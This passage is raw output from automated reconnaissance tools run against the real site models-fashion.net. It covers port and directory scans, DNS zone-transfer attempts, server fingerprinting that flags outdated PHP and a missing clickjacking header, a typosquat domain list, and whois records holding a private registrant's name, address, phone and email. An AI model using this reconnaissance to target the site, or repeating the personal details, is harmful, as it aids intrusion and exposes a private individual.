693[!] Requesting AnubisDB
694[!] Requesting ThreatMiner
695
696[+] Results :
697
698[+] www.models-fashion.net
699[+] 213.183.63.253
700
701[+] Total Found : 2
702
703[+] Port : 33434
704[+] Timeout : 1.0
705
706[!] Starting UDP Traceroute...
707
708HOPS IP HOST
709
7101 10.203.14.1 _gateway
7112 45.131.5.3 Unknown
7123 109.236.95.228 Unknown
7134 109.236.95.173 Unknown
7145 195.22.213.126 Unknown
7156 195.22.211.211 ae11.sofia1.sof.seabone.net
7167 89.221.39.27 melbikomas.sofia1.sof.seabone.net
7178 213.183.63.253 vm201114.melbi.space
718
719[!] Starting Port Scan...
720
721[+] Testing Top 1000 Ports...
722
723[+] 22 ssh
724[+] 80 http
725
726[!] Starting Crawler...
727
728[+] Looking for robots.txt........[ Found ]
729[+] Extracting robots Links.......[ 3 ]
730[+] Looking for sitemap.xml.......[ Found ]
731[+] Extracting sitemap Links......[ 6 ]
732[+] Extracting CSS Links..........[ 4 ]
733[+] Extracting Javascript Links...[ 7 ]
734[+] Extracting Internal Links.....[ 143 ]
735[+] Extracting External Links.....[ 59 ]
736[+] Extracting Images.............[ 12 ]
737[+] Crawling Sitemaps.............[ 123 ]
738[+] Crawling Javascripts..........[ 4 ]
739
740[+] Total Unique Links Extracted : 348
741
742[!] Starting Directory Search...
743
744[+] Threads : 50
745[+] Timeout : 10.0
746[+] Wordlist : wordlists/dirb_common.txt
747[+] Allow Redirects : False
748[+] SSL Verification : True
749[+] DNS Servers : 1.1.1.1
750
751[+] 403 | http://models-fashion.net/.hta
752[+] 403 | http://models-fashion.net/.htaccess
753[+] 403 | http://models-fashion.net/.htpasswd
754[+] 301 | http://models-fashion.net/0
755[+] 301 | http://models-fashion.net/a
756[+] 301 | http://models-fashion.net/A
757[+] 302 | http://models-fashion.net/admin
758[+] 301 | http://models-fashion.net/cgi-bin
759[+] 403 | http://models-fashion.net/cgi-bin/
760[+] 302 | http://models-fashion.net/config
761[+] 200 | http://models-fashion.net/favicon.ico
762[+] 301 | http://models-fashion.net/wp-admin
763[+] 301 | http://models-fashion.net/wp-content
764[+] 301 | http://models-fashion.net/wp-includes
765
766[+] Directories Found : 14
767[+] Directories Skipped : 3957
768[+] Total Requests : 3971
769######################################################################################################################
770[*] Processing domain models-fashion.net
771[*] Using system resolvers ['10.101.0.243', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
772[+] Getting nameservers
77374.121.191.194 - ns5.dynu.com
774207.38.70.2 - ns1.dynu.com
775104.247.193.125 - ns2.dynu.com
77645.119.209.45 - ns4.dynu.com
777104.149.238.82 - ns3.dynu.com
77869.25.120.150 - ns6.dynu.com
779[-] Zone transfer failed
780
781[+] Wildcard domain found - 213.183.63.253
782[*] Scanning models-fashion.net for A records
783#####################################################################################################################
784*] Testing NS Servers for Zone Transfer
785[*] Checking for Zone Transfer for models-fashion.net name servers
786[*] Resolving SOA Record
787[+] SOA ns1.dynu.com 207.38.70.2
788[*] Resolving NS Records
789[*] NS Servers found:
790[*] NS ns1.dynu.com 207.38.70.2
791[*] NS ns1.dynu.com 2602:ff23:0:8888::2
792[*] NS ns6.dynu.com 69.25.120.150
793[*] NS ns6.dynu.com 2600:c05:3002:1::150
794[*] NS ns5.dynu.com 74.121.191.194
795[*] NS ns5.dynu.com 2607:f8f8:630:1058::8888
796[*] NS ns2.dynu.com 104.247.193.125
797[*] NS ns2.dynu.com 2607:3f00:11:32::8888
798[*] NS ns3.dynu.com 104.149.238.82
799[*] NS ns3.dynu.com 2604:6600:2000:39::8888
800[*] NS ns4.dynu.com 45.119.209.45
801[*] NS ns4.dynu.com 2605:aa80:2::8888
802[*] Removing any duplicate NS server IP Addresses...
803[*]
804[*] Trying NS server 104.247.193.125
805[+] 104.247.193.125 Has port 53 TCP Open
806[-] Zone Transfer Failed!
807[-] No answer or RRset not for qname
808[*]
809[*] Trying NS server 2602:ff23:0:8888::2
810[-] Zone Transfer Failed for 2602:ff23:0:8888::2!
811[-] Port 53 TCP is being filtered
812[*]
813[*] Trying NS server 2600:c05:3002:1::150
814[-] Zone Transfer Failed for 2600:c05:3002:1::150!
815[-] Port 53 TCP is being filtered
816[*]
817[*] Trying NS server 2607:3f00:11:32::8888
818[-] Zone Transfer Failed for 2607:3f00:11:32::8888!
819[-] Port 53 TCP is being filtered
820[*]
821[*] Trying NS server 45.119.209.45
822[+] 45.119.209.45 Has port 53 TCP Open
823[-] Zone Transfer Failed!
824[-] No answer or RRset not for qname
825[*]
826[*] Trying NS server 2604:6600:2000:39::8888
827[-] Zone Transfer Failed for 2604:6600:2000:39::8888!
828[-] Port 53 TCP is being filtered
829[*]
830[*] Trying NS server 104.149.238.82
831[+] 104.149.238.82 Has port 53 TCP Open
832[-] Zone Transfer Failed!
833[-] No answer or RRset not for qname
834[*]
835[*] Trying NS server 207.38.70.2
836[+] 207.38.70.2 Has port 53 TCP Open
837[-] Zone Transfer Failed!
838[-] No answer or RRset not for qname
839[*]
840[*] Trying NS server 2605:aa80:2::8888
841[-] Zone Transfer Failed for 2605:aa80:2::8888!
842[-] Port 53 TCP is being filtered
843[*]
844[*] Trying NS server 2607:f8f8:630:1058::8888
845[-] Zone Transfer Failed for 2607:f8f8:630:1058::8888!
846[-] Port 53 TCP is being filtered
847[*]
848[*] Trying NS server 69.25.120.150
849[+] 69.25.120.150 Has port 53 TCP Open
850[-] Zone Transfer Failed!
851[-] No answer or RRset not for qname
852[*]
853[*] Trying NS server 74.121.191.194
854[+] 74.121.191.194 Has port 53 TCP Open
855[-] Zone Transfer Failed!
856[-] No answer or RRset not for qname
857######################################################################################################################
858[+] Starting At 2020-03-31 18:07:43.979924
859[+] Collecting Information On: http://models-fashion.net/
860[#] Status: 500
861--------------------------------------------------
862[#] Web Server Detected: nginx/1.16.1
863[#] X-Powered-By: PHP/5.4.45
864[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
865- Server: nginx/1.16.1
866- Date: Tue, 31 Mar 2020 22:08:00 GMT
867- Content-Type: text/html; charset=utf-8
868- Content-Length: 200
869- Connection: keep-alive
870- Upgrade: h2,h2c
871- X-Powered-By: PHP/5.4.45
872- Expires: Wed, 11 Jan 1984 05:00:00 GMT
873- Cache-Control: no-cache, must-revalidate, max-age=0
874- Pragma: no-cache
875- Vary: Accept-Encoding,User-Agent
876- Content-Encoding: gzip
877--------------------------------------------------
878[#] Finding Location..!
879[#] status: success
880[#] country: United States
881[#] countryCode: US
882[#] region: NJ
883[#] regionName: New Jersey
884[#] city: Newark
885[#] zip: 07175
886[#] lat: 40.7357
887[#] lon: -74.1724
888[#] timezone: America/New_York
889[#] isp: Melbikomas UAB
890[#] org: Melbikomas UAB
891[#] as: AS56630 Melbikomas UAB
892[#] query: 213.183.63.253
893--------------------------------------------------
894[x] Didn't Detect WAF Presence on: http://models-fashion.net/
895--------------------------------------------------
896[#] Starting Reverse DNS
897[-] Failed ! Fail
898--------------------------------------------------
899[!] Scanning Open Port
900[#] 22/tcp open ssh
901[#] 80/tcp open http
902--------------------------------------------------
903[+] Getting SSL Info
904[Errno 111] Connection refused
905--------------------------------------------------
906[+] Collecting Information Disclosure!
907[#] Detecting sitemap.xml file
908[-] sitemap.xml file not Found!?
909[#] Detecting robots.txt file
910[-] robots.txt file not Found!?
911[#] Detecting GNU Mailman
912[-] GNU Mailman App Not Detected!?
913--------------------------------------------------
914[+] Crawling Url Parameter On: http://models-fashion.net/
915--------------------------------------------------
916[#] Searching Html Form !
917[-] No Html Form Found!?
918[#] Mapping Subdomain..
919[!] Found 2 Subdomain
920- models-fashion.net
921- www.models-fashion.net
922--------------------------------------------------
923[!] Done At 2020-03-31 18:09:14.208634
924######################################################################################################################
925traceroute to models-fashion.net (213.183.63.253), 30 hops max, 60 byte packets
926 1 _gateway (10.203.14.1) 99.301 ms 103.843 ms 103.849 ms
927 2 45.131.5.2 (45.131.5.2) 103.932 ms 103.946 ms *
928 3 109.236.95.224 (109.236.95.224) 103.750 ms 109.236.95.230 (109.236.95.230) 103.771 ms 103.800 ms
929 4 109.236.95.173 (109.236.95.173) 104.605 ms 109.236.95.167 (109.236.95.167) 104.612 ms 104.602 ms
930 5 195.22.213.126 (195.22.213.126) 104.879 ms 104.806 ms 104.835 ms
931 6 ae10.sofia1.sof.seabone.net (195.22.211.209) 160.752 ms ae11.sofia1.sof.seabone.net (195.22.211.211) 154.754 ms ae10.sofia1.sof.seabone.net (195.22.211.209) 158.600 ms
932 7 melbikomas.sofia1.sof.seabone.net (89.221.39.27) 146.089 ms 144.131 ms 144.846 ms
933 8 * vm201114.melbi.space (213.183.63.253) 137.544 ms 137.552 ms
934######################################################################################################################
935Domains still to check: 1
936 Checking if the hostname models-fashion.net. given is in fact a domain...
937
938Analyzing domain: models-fashion.net.
939 Checking NameServers using system default resolver...
940 IP: 74.121.191.194 (United States)
941 HostName: ns5.dynu.com Type: NS
942 HostName: 1.2.3.4-reverse.wowrack.com Type: PTR
943 IP: 45.119.209.45 (United States)
944 HostName: ns4.dynu.com Type: NS
945 HostName: ns4.dynu.com Type: PTR
946 IP: 104.247.193.125 (United States)
947 HostName: ns2.dynu.com Type: NS
948 HostName: ns2.dynu.com Type: PTR
949 IP: 104.149.238.82 (United States)
950 HostName: ns3.dynu.com Type: NS
951 HostName: ns3.dynu.com Type: PTR
952 IP: 69.25.120.150 (United States)
953 HostName: ns6.dynu.com Type: NS
954 HostName: ns6.dynu.com Type: PTR
955 IP: 207.38.70.2 (United States)
956 HostName: ns1.dynu.com Type: NS
957 HostName: ns1.dynu.com Type: PTR
958
959 Checking MailServers using system default resolver...
960 WARNING!! There are no MX records for this domain
961 WARNING!! This domain has wildcards activated for hostnames resolution. We are checking "www" anyway, but perhaps it doesn't exists!
962
963 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
964 No zone transfer found on nameserver 45.119.209.45
965 No zone transfer found on nameserver 104.247.193.125
966 No zone transfer found on nameserver 207.38.70.2
967 No zone transfer found on nameserver 69.25.120.150
968 No zone transfer found on nameserver 74.121.191.194
969 No zone transfer found on nameserver 104.149.238.82
970
971 Checking SPF record...
972 No SPF record
973
974 Checking 1 most common hostnames using system default resolver...
975 IP: 213.183.63.253 (Bulgaria)
976 HostName: www.models-fashion.net. Type: A
977
978 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
979 Checking netblock 45.119.209.0
980 Checking netblock 104.247.193.0
981 Checking netblock 213.183.63.0
982 Checking netblock 207.38.70.0
983 Checking netblock 69.25.120.0
984 Checking netblock 74.121.191.0
985 Checking netblock 104.149.238.0
986
987 Searching for models-fashion.net. emails in Google
988
989 Checking 7 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
990 Host 45.119.209.45 is up (echo-reply ttl 51)
991 Host 104.247.193.125 is up (host-prohibited ttl 48)
992 Host 213.183.63.253 is up (echo-reply ttl 58)
993 Host 207.38.70.2 is up (host-prohibited ttl 45)
994 Host 69.25.120.150 is up (host-prohibited ttl 47)
995 Host 74.121.191.194 is up (echo-reply ttl 46)
996 Host 104.149.238.82 is up (host-prohibited ttl 56)
997
998 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
999 Scanning ip 45.119.209.45 (ns4.dynu.com (PTR)):
1000 53/tcp open domain? syn-ack ttl 51
1001 | fingerprint-strings:
1002 | DNSVersionBindReqTCP:
1003 | version
1004 |_ bind
1005 Scanning ip 104.247.193.125 (ns2.dynu.com (PTR)):
1006 53/tcp open domain? syn-ack ttl 48
1007 | fingerprint-strings:
1008 | DNSVersionBindReqTCP:
1009 | version
1010 |_ bind
1011 Scanning ip 213.183.63.253 (www.models-fashion.net.):
1012adjust_timeouts2: packet supposedly had rtt of -94247 microseconds. Ignoring time.
1013adjust_timeouts2: packet supposedly had rtt of -94247 microseconds. Ignoring time.
1014adjust_timeouts2: packet supposedly had rtt of -290066 microseconds. Ignoring time.
1015adjust_timeouts2: packet supposedly had rtt of -290066 microseconds. Ignoring time.
1016adjust_timeouts2: packet supposedly had rtt of -285965 microseconds. Ignoring time.
1017adjust_timeouts2: packet supposedly had rtt of -285965 microseconds. Ignoring time.
1018adjust_timeouts2: packet supposedly had rtt of -285630 microseconds. Ignoring time.
1019adjust_timeouts2: packet supposedly had rtt of -285630 microseconds. Ignoring time.
1020 22/tcp open ssh syn-ack ttl 58 OpenSSH 7.4 (protocol 2.0)
1021 | ssh-hostkey:
1022 | 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
1023 |_ 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
1024 80/tcp open http syn-ack ttl 58 nginx 1.16.1
1025 | http-methods:
1026 |_ Supported Methods: OPTIONS HEAD GET POST
1027 |_http-server-header: nginx/1.16.1
1028 |_http-title: Shared IP
1029 Scanning ip 207.38.70.2 (ns1.dynu.com (PTR)):
1030 53/tcp open domain? syn-ack ttl 45
1031 | fingerprint-strings:
1032 | DNSVersionBindReqTCP:
1033 | version
1034 |_ bind
1035 Scanning ip 69.25.120.150 (ns6.dynu.com (PTR)):
1036 53/tcp open domain? syn-ack ttl 47
1037 | fingerprint-strings:
1038 | DNSVersionBindReqTCP:
1039 | version
1040 |_ bind
1041 Scanning ip 74.121.191.194 (1.2.3.4-reverse.wowrack.com (PTR)):
1042 53/tcp open domain? syn-ack ttl 46
1043 | fingerprint-strings:
1044 | DNSVersionBindReqTCP:
1045 | version
1046 |_ bind
1047 Scanning ip 104.149.238.82 (ns3.dynu.com (PTR)):
1048 53/tcp open domain? syn-ack ttl 56
1049 | fingerprint-strings:
1050 | DNSVersionBindReqTCP:
1051 | version
1052 |_ bind
1053 WebCrawling domain's web servers... up to 50 max links.
1054
1055 + URL to crawl: http://www.models-fashion.net.
1056 + Date: 2020-03-31
1057
1058 + Crawling URL: http://www.models-fashion.net.:
1059 + Links:
1060 + Crawling http://www.models-fashion.net.
1061 + Searching for directories...
1062 - Found: http://www.models-fashion.net./t1.extreme-dm.com/
1063 + Searching open folders...
1064 - http://www.models-fashion.net./t1.extreme-dm.com/ (404 Not Found)
1065
1066--Finished--
1067Summary information for domain models-fashion.net.
1068-----------------------------------------
1069
1070 Domain Ips Information:
1071 IP: 45.119.209.45
1072 HostName: ns4.dynu.com Type: NS
1073 HostName: ns4.dynu.com Type: PTR
1074 Country: United States
1075 Is Active: True (echo-reply ttl 51)
1076 Port: 53/tcp open domain? syn-ack ttl 51
1077 Script Info: | fingerprint-strings:
1078 Script Info: | DNSVersionBindReqTCP:
1079 Script Info: | version
1080 Script Info: |_ bind
1081 IP: 104.247.193.125
1082 HostName: ns2.dynu.com Type: NS
1083 HostName: ns2.dynu.com Type: PTR
1084 Country: United States
1085 Is Active: True (host-prohibited ttl 48)
1086 Port: 53/tcp open domain? syn-ack ttl 48
1087 Script Info: | fingerprint-strings:
1088 Script Info: | DNSVersionBindReqTCP:
1089 Script Info: | version
1090 Script Info: |_ bind
1091 IP: 213.183.63.253
1092 HostName: www.models-fashion.net. Type: A
1093 Country: Bulgaria
1094 Is Active: True (echo-reply ttl 58)
1095 Port: 22/tcp open ssh syn-ack ttl 58 OpenSSH 7.4 (protocol 2.0)
1096 Script Info: | ssh-hostkey:
1097 Script Info: | 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
1098 Script Info: |_ 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
1099 Port: 80/tcp open http syn-ack ttl 58 nginx 1.16.1
1100 Script Info: | http-methods:
1101 Script Info: |_ Supported Methods: OPTIONS HEAD GET POST
1102 Script Info: |_http-server-header: nginx/1.16.1
1103 Script Info: |_http-title: Shared IP
1104 IP: 207.38.70.2
1105 HostName: ns1.dynu.com Type: NS
1106 HostName: ns1.dynu.com Type: PTR
1107 Country: United States
1108 Is Active: True (host-prohibited ttl 45)
1109 Port: 53/tcp open domain? syn-ack ttl 45
1110 Script Info: | fingerprint-strings:
1111 Script Info: | DNSVersionBindReqTCP:
1112 Script Info: | version
1113 Script Info: |_ bind
1114 IP: 69.25.120.150
1115 HostName: ns6.dynu.com Type: NS
1116 HostName: ns6.dynu.com Type: PTR
1117 Country: United States
1118 Is Active: True (host-prohibited ttl 47)
1119 Port: 53/tcp open domain? syn-ack ttl 47
1120 Script Info: | fingerprint-strings:
1121 Script Info: | DNSVersionBindReqTCP:
1122 Script Info: | version
1123 Script Info: |_ bind
1124 IP: 74.121.191.194
1125 HostName: ns5.dynu.com Type: NS
1126 HostName: 1.2.3.4-reverse.wowrack.com Type: PTR
1127 Country: United States
1128 Is Active: True (echo-reply ttl 46)
1129 Port: 53/tcp open domain? syn-ack ttl 46
1130 Script Info: | fingerprint-strings:
1131 Script Info: | DNSVersionBindReqTCP:
1132 Script Info: | version
1133 Script Info: |_ bind
1134 IP: 104.149.238.82
1135 HostName: ns3.dynu.com Type: NS
1136 HostName: ns3.dynu.com Type: PTR
1137 Country: United States
1138 Is Active: True (host-prohibited ttl 56)
1139 Port: 53/tcp open domain? syn-ack ttl 56
1140 Script Info: | fingerprint-strings:
1141 Script Info: | DNSVersionBindReqTCP:
1142 Script Info: | version
1143 Script Info: |_ bind
1144
1145--------------End Summary --------------
1146-----------------------------------------
1147#####################################################################################################################
1148----- models-fashion.net -----
1149
1150
1151Host's addresses:
1152__________________
1153
1154models-fashion.net. 63 IN A 213.183.63.253
1155
1156
1157Wildcard detection using: ibkuljqegfrf
1158_______________________________________
1159
1160ibkuljqegfrf.models-fashion.net. 120 IN A 213.183.63.253
1161
1162
1163!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1164
1165 Wildcards detected, all subdomains will point to the same IP address
1166 Omitting results containing 213.183.63.253.
1167 Maybe you are using OpenDNS servers.
1168
1169!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1170
1171
1172Name Servers:
1173______________
1174
1175ns2.dynu.com. 486 IN A 104.247.193.125
1176ns6.dynu.com. 3068 IN A 69.25.120.150
1177ns4.dynu.com. 486 IN A 45.119.209.45
1178ns5.dynu.com. 3064 IN A 74.121.191.194
1179ns3.dynu.com. 486 IN A 104.149.238.82
1180ns1.dynu.com. 83286 IN A 207.38.70.2
1181
1182
1183Mail (MX) Servers:
1184___________________
1185
1186
1187
1188
1189Brute forcing with /usr/share/dnsenum/dns.txt:
1190_______________________________________________
1191
1192
1193
1194Launching Whois Queries:
1195_________________________
1196
1197 whois ip result: 213.183.63.0 -> 213.183.63.0/24
1198
1199
1200models-fashion.net__________________
1201
1202 213.183.63.0/24
1203#####################################################################################################################
1204dnsenum VERSION:1.2.6
1205
1206----- models-fashion.net -----
1207
1208
1209Host's addresses:
1210__________________
1211
1212models-fashion.net. 119 IN A 213.183.63.253
1213
1214
1215Wildcard detection using: tmhquqoiznxw
1216_______________________________________
1217
1218tmhquqoiznxw.models-fashion.net. 120 IN A 213.183.63.253
1219
1220
1221!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1222
1223 Wildcards detected, all subdomains will point to the same IP address
1224 Omitting results containing 213.183.63.253.
1225 Maybe you are using OpenDNS servers.
1226
1227!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1228
1229
1230Name Servers:
1231______________
1232
1233ns3.dynu.com. 542 IN A 104.149.238.82
1234ns1.dynu.com. 83342 IN A 207.38.70.2
1235ns4.dynu.com. 542 IN A 45.119.209.45
1236ns5.dynu.com. 3120 IN A 74.121.191.194
1237ns6.dynu.com. 3124 IN A 69.25.120.150
1238ns2.dynu.com. 542 IN A 104.247.193.125
1239
1240
1241Mail (MX) Servers:
1242___________________
1243
1244
1245
1246Trying Zone Transfers and getting Bind Versions:
1247_________________________________________________
1248
1249
1250Trying Zone Transfer for models-fashion.net on ns3.dynu.com ...
1251
1252Trying Zone Transfer for models-fashion.net on ns1.dynu.com ...
1253
1254Trying Zone Transfer for models-fashion.net on ns4.dynu.com ...
1255
1256Trying Zone Transfer for models-fashion.net on ns5.dynu.com ...
1257
1258Trying Zone Transfer for models-fashion.net on ns6.dynu.com ...
1259
1260Trying Zone Transfer for models-fashion.net on ns2.dynu.com ...
1261
1262
1263Brute forcing with /usr/share/sniper/wordlists/vhosts.txt:
1264___________________________________________________________
1265
1266
1267
1268models-fashion.net class C netranges:
1269______________________________________
1270
1271 213.183.63.0/24
1272
1273
1274models-fashion.net ip blocks:
1275______________________________
1276
1277 213.183.63.253/32
1278
1279######################################################################################################################
1280 Domain Name: MODELS-FASHION.NET
1281 Registry Domain ID: 2281895284_DOMAIN_NET-VRSN
1282 Registrar WHOIS Server: whois.PublicDomainRegistry.com
1283 Registrar URL: http://www.publicdomainregistry.com
1284 Updated Date: 2019-06-24T09:34:17Z
1285 Creation Date: 2018-07-03T15:32:36Z
1286 Registry Expiry Date: 2020-07-03T15:32:36Z
1287 Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
1288 Registrar IANA ID: 303
1289 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
1290 Registrar Abuse Contact Phone: +1.2013775952
1291 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
1292 Name Server: NS1.DYNU.COM
1293 Name Server: NS2.DYNU.COM
1294 Name Server: NS3.DYNU.COM
1295 Name Server: NS4.DYNU.COM
1296 DNSSEC: unsigned
1297######################################################################################################################
1298Registrars.
1299Domain Name: MODELS-FASHION.NET
1300Registry Domain ID: 2281895284_DOMAIN_NET-VRSN
1301Registrar WHOIS Server: whois.publicdomainregistry.com
1302Registrar URL: www.publicdomainregistry.com
1303Updated Date: 2019-06-24T09:34:18Z
1304Creation Date: 2018-07-03T15:32:36Z
1305Registrar Registration Expiration Date: 2020-07-03T15:32:36Z
1306Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
1307Registrar IANA ID: 303
1308Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
1309Registry Registrant ID: Not Available From Registry
1310Registrant Name: Kornienko Dmitri
1311Registrant Organization:
1312Registrant Street: Topol-2 5-609
1313Registrant City: Dnepropetrovsk
1314Registrant State/Province: Dnipropetrovsk Oblast
1315Registrant Postal Code: 49040
1316Registrant Country: UA
1317Registrant Phone: +380.567717976
1318Registrant Phone Ext:
1319Registrant Fax:
1320Registrant Fax Ext:
1321Registrant Email: mr.kornienko.82@mail.ru
1322Registry Admin ID: Not Available From Registry
1323Admin Name: Kornienko Dmitri
1324Admin Organization:
1325Admin Street: Topol-2 5-609
1326Admin City: Dnepropetrovsk
1327Admin State/Province: Dnipropetrovsk Oblast
1328Admin Postal Code: 49040
1329Admin Country: UA
1330Admin Phone: +380.567717976
1331Admin Phone Ext:
1332Admin Fax:
1333Admin Fax Ext:
1334Admin Email: mr.kornienko.82@mail.ru
1335Registry Tech ID: Not Available From Registry
1336Tech Name: Kornienko Dmitri
1337Tech Organization:
1338Tech Street: Topol-2 5-609
1339Tech City: Dnepropetrovsk
1340Tech State/Province: Dnipropetrovsk Oblast
1341Tech Postal Code: 49040
1342Tech Country: UA
1343Tech Phone: +380.567717976
1344Tech Phone Ext:
1345Tech Fax:
1346Tech Fax Ext:
1347Tech Email: mr.kornienko.82@mail.ru
1348Name Server: ns1.dynu.com
1349Name Server: ns2.dynu.com
1350Name Server: ns3.dynu.com
1351Name Server: ns4.dynu.com
1352DNSSEC: Unsigned
1353######################################################################################################################
1354URLCrazy Domain Report
1355Domain : models-fashion.net
1356Keyboard : qwerty
1357At : 2020-03-31 18:15:01 -0400
1358
1359# Please wait. 178 hostnames to process
1360
1361Typo Type Typo DNS-A CC-A DNS-MX Extn
1362---------------------------------------------------------------------------------------------
1363Character Omission mdels-fashion.net ? net
1364Character Omission model-fashion.net 119.8.32.76 CN,CHINA net
1365Character Omission models-ashion.net ? net
1366Character Omission models-fahion.net ? net
1367Character Omission models-fashin.net ? net
1368Character Omission models-fashio.net ? net
1369Character Omission models-fashion.ne ? ne
1370Character Omission models-fashon.net ? net
1371Character Omission models-fasion.net ? net
1372Character Omission models-fshion.net ? net
1373Character Omission modelsfashion.net 109.68.33.25 GB,UNITED KINGDOM net
1374Character Omission modes-fashion.net ? net
1375Character Omission modls-fashion.net ? net
1376Character Omission moels-fashion.net ? net
1377Character Repeat mmodels-fashion.net ? net
1378Character Repeat moddels-fashion.net ? net
1379Character Repeat modeels-fashion.net ? net
1380Character Repeat modells-fashion.net ? net
1381Character Repeat models--fashion.net ? net
1382Character Repeat models-faashion.net ? net
1383Character Repeat models-fashhion.net ? net
1384Character Repeat models-fashiion.net ? net
1385Character Repeat models-fashionn.net ? net
1386Character Repeat models-fashioon.net ? net
1387Character Repeat models-fasshion.net ? net
1388Character Repeat models-ffashion.net ? net
1389Character Repeat modelss-fashion.net ? net
1390Character Repeat moodels-fashion.net ? net
1391Character Swap mdoels-fashion.net ? net
1392Character Swap model-sfashion.net ? net
1393Character Swap models-afshion.net ? net
1394Character Swap models-fahsion.net ? net
1395Character Swap models-fashino.net ? net
1396Character Swap models-fashoin.net ? net
1397Character Swap models-fasihon.net ? net
1398Character Swap models-fsahion.net ? net
1399Character Swap modelsf-ashion.net ? net
1400Character Swap modesl-fashion.net ? net
1401Character Swap modles-fashion.net ? net
1402Character Swap moedls-fashion.net ? net
1403Character Swap omdels-fashion.net ? net
1404Character Replacement midels-fashion.net ? net
1405Character Replacement modeks-fashion.net ? net
1406Character Replacement modela-fashion.net ? net
1407Character Replacement modeld-fashion.net ? net
1408Character Replacement models-dashion.net ? net
1409Character Replacement models-faahion.net ? net
1410Character Replacement models-fadhion.net ? net
1411Character Replacement models-fasgion.net ? net
1412Character Replacement models-fashiin.net ? net
1413Character Replacement models-fashiob.net ? net
1414Character Replacement models-fashiom.net ? net
1415Character Replacement models-fashipn.net ? net
1416Character Replacement models-fashoon.net ? net
1417Character Replacement models-fashuon.net ? net
1418Character Replacement models-fasjion.net ? net
1419Character Replacement models-fsshion.net ? net
1420Character Replacement models-gashion.net ? net
1421Character Replacement models0fashion.net ? net
1422Character Replacement modrls-fashion.net ? net
1423Character Replacement modwls-fashion.net ? net
1424Character Replacement mofels-fashion.net ? net
1425Character Replacement mosels-fashion.net ? net
1426Character Replacement mpdels-fashion.net ? net
1427Character Replacement nodels-fashion.net ? net
1428Character Insertion mnodels-fashion.net ? net
1429Character Insertion modelks-fashion.net ? net
1430Character Insertion models-0fashion.net ? net
1431Character Insertion models-fasahion.net ? net
1432Character Insertion models-fasdhion.net ? net
1433Character Insertion models-fashgion.net ? net
1434Character Insertion models-fashioin.net ? net
1435Character Insertion models-fashionb.net ? net
1436Character Insertion models-fashionm.net ? net
1437Character Insertion models-fashiopn.net ? net
1438Character Insertion models-fashiuon.net ? net
1439Character Insertion models-fashjion.net ? net
1440Character Insertion models-fdashion.net ? net
1441Character Insertion models-fgashion.net ? net
1442Character Insertion modelsa-fashion.net ? net
1443Character Insertion modelsd-fashion.net ? net
1444Character Insertion moderls-fashion.net ? net
1445Character Insertion modewls-fashion.net ? net
1446Character Insertion modfels-fashion.net ? net
1447Character Insertion modsels-fashion.net ? net
1448Character Insertion moidels-fashion.net ? net
1449Character Insertion mopdels-fashion.net ? net
1450Missing Dot models-fashionnet.com ? com
1451Missing Dot wwwmodels-fashion.net ? net
1452Singular or Pluralise models-fashions.net ? net
1453Vowel Swap madels-fashian.net ? net
1454Vowel Swap medels-fashien.net ? net
1455Vowel Swap midels-fashiin.net ? net
1456Vowel Swap models-fashaon.net ? net
1457Vowel Swap models-fasheon.net ? net
1458Vowel Swap models-feshion.net ? net
1459Vowel Swap models-fishion.net ? net
1460Vowel Swap models-foshion.net ? net
1461Vowel Swap models-fushion.net ? net
1462Vowel Swap mudels-fashiun.net ? net
1463Homophones models-fashayeon.net ? net
1464Homophones models-fasheyeon.net ? net
1465Homophones models-fashighon.net ? net
1466Homophones mowedls-fashion.net ? net
1467Bit Flipping -odels-fashion.net ? net
1468Bit Flipping eodels-fashion.net ? net
1469Bit Flipping iodels-fashion.net ? net
1470Bit Flipping lodels-fashion.net ? net
1471Bit Flipping mgdels-fashion.net ? net
1472Bit Flipping mkdels-fashion.net ? net
1473Bit Flipping mmdels-fashion.net ? net
1474Bit Flipping mndels-fashion.net ? net
1475Bit Flipping modals-fashion.net ? net
1476Bit Flipping moddls-fashion.net ? net
1477Bit Flipping modeds-fashion.net ? net
1478Bit Flipping modehs-fashion.net ? net
1479Bit Flipping model3-fashion.net ? net
1480Bit Flipping modelc-fashion.net ? net
1481Bit Flipping modelq-fashion.net ? net
1482Bit Flipping modelr-fashion.net ? net
1483Bit Flipping models-bashion.net ? net
1484Bit Flipping models-fa3hion.net ? net
1485Bit Flipping models-fachion.net ? net
1486Bit Flipping models-faqhion.net ? net
1487Bit Flipping models-farhion.net ? net
1488Bit Flipping models-fashhon.net ? net
1489Bit Flipping models-fashign.net ? net
1490Bit Flipping models-fashikn.net ? net
1491Bit Flipping models-fashimn.net ? net
1492Bit Flipping models-fashinn.net ? net
1493Bit Flipping models-fashiof.net ? net
1494Bit Flipping models-fashioj.net ? net
1495Bit Flipping models-fashiol.net ? net
1496Bit Flipping models-fashioo.net ? net
1497Bit Flipping models-fashkon.net ? net
1498Bit Flipping models-fashmon.net ? net
1499Bit Flipping models-fashyon.net ? net
1500Bit Flipping models-fasiion.net ? net
1501Bit Flipping models-faslion.net ? net
1502Bit Flipping models-fasxion.net ? net
